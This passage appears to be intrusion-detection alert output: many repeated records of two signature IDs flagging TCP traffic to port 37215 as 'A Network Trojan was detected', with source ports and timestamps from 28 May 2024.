          SID:2835222
          Source Port:41968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235790
          SID:2835222
          Source Port:36552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266903
          SID:2829579
          Source Port:41902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321141
          SID:2835222
          Source Port:35306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712243
          SID:2829579
          Source Port:41042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305553
          SID:2835222
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656623
          SID:2829579
          Source Port:58202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125842
          SID:2835222
          Source Port:60202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175782
          SID:2829579
          Source Port:43008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.625592
          SID:2829579
          Source Port:42362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267565
          SID:2829579
          Source Port:53464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542926
          SID:2835222
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635876
          SID:2829579
          Source Port:55878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214267
          SID:2829579
          Source Port:53192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161819
          SID:2835222
          Source Port:47812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372054
          SID:2829579
          Source Port:44524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051230
          SID:2829579
          Source Port:38486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817729
          SID:2829579
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.995610
          SID:2829579
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561105
          SID:2835222
          Source Port:56460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708553
          SID:2829579
          Source Port:42134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480917
          SID:2829579
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337578
          SID:2835222
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095548
          SID:2835222
          Source Port:41976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977287
          SID:2829579
          Source Port:47336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840484
          SID:2835222
          Source Port:53834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652437
          SID:2829579
          Source Port:45810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555172
          SID:2829579
          Source Port:59582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711014
          SID:2835222
          Source Port:47086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876202
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010448
          SID:2835222
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527052
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808067
          SID:2829579
          Source Port:46084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547771
          SID:2835222
          Source Port:52368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853303
          SID:2829579
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.060936
          SID:2835222
          Source Port:34734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974035
          SID:2829579
          Source Port:54580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093566
          SID:2829579
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248849
          SID:2829579
          Source Port:47852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782919
          SID:2835222
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797630
          SID:2829579
          Source Port:51584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336389
          SID:2835222
          Source Port:42014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301202
          SID:2829579
          Source Port:46834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175815
          SID:2829579
          Source Port:53382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225954
          SID:2835222
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878276
          SID:2829579
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630020
          SID:2835222
          Source Port:55040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299000
          SID:2835222
          Source Port:57884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597259
          SID:2835222
          Source Port:36624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298561
          SID:2835222
          Source Port:57972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737352
          SID:2829579
          Source Port:38718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403350
          SID:2835222
          Source Port:60552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332195
          SID:2829579
          Source Port:54048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267423
          SID:2835222
          Source Port:39070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893939
          SID:2829579
          Source Port:47488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064903
          SID:2829579
          Source Port:39924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327795
          SID:2835222
          Source Port:39590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.514181
          SID:2835222
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839608
          SID:2835222
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227097
          SID:2829579
          Source Port:59288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537982
          SID:2829579
          Source Port:56502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325855
          SID:2835222
          Source Port:57940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322166
          SID:2835222
          Source Port:44140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077636
          SID:2829579
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871121
          SID:2835222
          Source Port:42428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102177
          SID:2835222
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441795
          SID:2829579
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543091
          SID:2835222
          Source Port:34726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185885
          SID:2829579
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.507838
          SID:2835222
          Source Port:35266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182648
          SID:2829579
          Source Port:35098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293920
          SID:2829579
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267328
          SID:2835222
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328551
          SID:2835222
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594296
          SID:2835222
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202006
          SID:2829579
          Source Port:48806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848346
          SID:2829579
          Source Port:41140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527385
          SID:2835222
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178916
          SID:2835222
          Source Port:33476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283881
          SID:2835222
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536704
          SID:2829579
          Source Port:44858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664084
          SID:2835222
          Source Port:41418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195387
          SID:2829579
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806420
          SID:2829579
          Source Port:48210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462636
          SID:2829579
          Source Port:54156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598905
          SID:2829579
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932683
          SID:2829579
          Source Port:51664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214113
          SID:2829579
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334665
          SID:2835222
          Source Port:36938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813283
          SID:2835222
          Source Port:51514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414731
          SID:2835222
          Source Port:57654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269160
          SID:2829579
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738288
          SID:2829579
          Source Port:55680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209146
          SID:2829579
          Source Port:56392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283602
          SID:2835222
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845139
          SID:2835222
          Source Port:53260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892409
          SID:2829579
          Source Port:55580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588606
          SID:2829579
          Source Port:41444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154095
          SID:2835222
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.236389
          SID:2829579
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908035
          SID:2835222
          Source Port:35700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891769
          SID:2829579
          Source Port:57174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342292
          SID:2829579
          Source Port:37336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958803
          SID:2835222
          Source Port:37946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892895
          SID:2835222
          Source Port:37836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142572
          SID:2835222
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848555
          SID:2829579
          Source Port:35050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846926
          SID:2829579
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959602
          SID:2829579
          Source Port:53488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195151
          SID:2835222
          Source Port:33770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745915
          SID:2829579
          Source Port:32872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770992
          SID:2835222
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210027
          SID:2835222
          Source Port:60278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874767
          SID:2829579
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680285
          SID:2829579
          Source Port:59010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213140
          SID:2829579
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551188
          SID:2829579
          Source Port:33896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764220
          SID:2835222
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473381
          SID:2835222
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727171
          SID:2829579
          Source Port:54558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153353
          SID:2835222
          Source Port:48922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987456
          SID:2835222
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183422
          SID:2829579
          Source Port:36372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176671
          SID:2835222
          Source Port:47728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692095
          SID:2829579
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113162
          SID:2835222
          Source Port:35562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482834
          SID:2835222
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401605
          SID:2829579
          Source Port:35006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860963
          SID:2835222
          Source Port:41004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221170
          SID:2835222
          Source Port:46582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708867
          SID:2835222
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439966
          SID:2835222
          Source Port:46560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156265
          SID:2829579
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277045
          SID:2835222
          Source Port:53750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123725
          SID:2829579
          Source Port:55258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017743
          SID:2829579
          Source Port:47936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287604
          SID:2835222
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298414
          SID:2829579
          Source Port:52646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511387
          SID:2829579
          Source Port:44758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173653
          SID:2835222
          Source Port:48184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102730
          SID:2835222
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265797
          SID:2829579
          Source Port:36246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330135
          SID:2829579
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710965
          SID:2829579
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186219
          SID:2835222
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635128
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948605
          SID:2829579
          Source Port:48902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529116
          SID:2835222
          Source Port:48658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849275
          SID:2829579
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878329
          SID:2835222
          Source Port:51580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298833
          SID:2835222
          Source Port:46118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511212
          SID:2829579
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595350
          SID:2835222
          Source Port:59470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977717
          SID:2835222
          Source Port:33148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266300
          SID:2829579
          Source Port:57450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879151
          SID:2829579
          Source Port:55970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.427705
          SID:2829579
          Source Port:41184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927629
          SID:2829579
          Source Port:54582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119153
          SID:2829579
          Source Port:49392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.539138
          SID:2829579
          Source Port:46804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300927
          SID:2829579
          Source Port:55904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559808
          SID:2835222
          Source Port:58250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338491
          SID:2835222
          Source Port:41868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269685
          SID:2829579
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687410
          SID:2835222
          Source Port:39102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794134
          SID:2829579
          Source Port:56230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983611
          SID:2829579
          Source Port:34470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048529
          SID:2829579
          Source Port:57734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291408
          SID:2835222
          Source Port:58526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562120
          SID:2835222
          Source Port:45316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.370769
          SID:2829579
          Source Port:51074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656144
          SID:2829579
          Source Port:45084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806802
          SID:2835222
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846877
          SID:2835222
          Source Port:44942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561910
          SID:2829579
          Source Port:53732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131763
          SID:2835222
          Source Port:35084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300050
          SID:2835222
          Source Port:44348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273296
          SID:2829579
          Source Port:50048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593181
          SID:2835222
          Source Port:45102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989018
          SID:2829579
          Source Port:36888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528294
          SID:2829579
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797874
          SID:2835222
          Source Port:50288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124600
          SID:2829579
          Source Port:53202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863333
          SID:2835222
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710667
          SID:2829579
          Source Port:44184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.446604
          SID:2835222
          Source Port:55598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726954
          SID:2829579
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217173
          SID:2829579
          Source Port:52124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267967
          SID:2829579
          Source Port:34558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176459
          SID:2835222
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141838
          SID:2835222
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167722
          SID:2835222
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591202
          SID:2835222
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592104
          SID:2835222
          Source Port:59700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400501
          SID:2835222
          Source Port:37614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102284
          SID:2835222
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800133
          SID:2835222
          Source Port:36078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.091034
          SID:2835222
          Source Port:57106
          Destination Port:37215
